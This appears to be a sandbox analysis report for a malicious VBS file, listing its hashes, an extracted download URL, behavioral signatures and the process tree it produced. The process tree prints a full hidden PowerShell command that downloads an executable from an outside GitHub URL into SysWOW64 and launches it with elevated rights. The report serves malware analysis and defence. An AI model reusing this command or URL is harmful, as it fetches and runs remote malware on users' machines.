Analysis
-
max time kernel
94s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
06/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
Resource
win10v2004-20240802-en
General
-
Target
7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs
-
Size
10KB
-
MD5
8e0172134b7f15992d6464767e423996
-
SHA1
071ee6dec991cbf30c9535a9cc119742dc273206
-
SHA256
7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac
-
SHA512
350a56053a31ab1d4231cba01c4f84d9fae371dcf979ad1d7c334b92b428f1105e2ef447296ce1db0c6ddb64b9ee1f0d8db4398754d5a898f2eb163a6b451ba1
-
SSDEEP
96:c8LFHzb+U5X4wrqqeH+5YoieyzgJABJ/fxrQsuO3zKA6pT8dmbTij+aUSH:cmFmU5KHJVerJABRu6N1dmnh8H
Malware Config
Extracted
http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/stubInf.exe
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2952 powershell.exe 6 2952 powershell.exe 7 2952 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2952 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\stubInf.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2952 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 376 wrote to memory of 2952 376 WScript.exe 30 PID 376 wrote to memory of 2952 376 WScript.exe 30 PID 376 wrote to memory of 2952 376 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7cbcd631a4e13b12f1577b073d66c0ff99a3b1d59589e8064cda7b1a06d7cfac.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(new-object System.Net.WebClient).DownloadFile('http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/stubInf.exe', 'C:\Windows\SysWOW64\stubInf.exe'); Start-Process 'C:\Windows\SysWOW64\stubInf.exe' -Verb runas"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-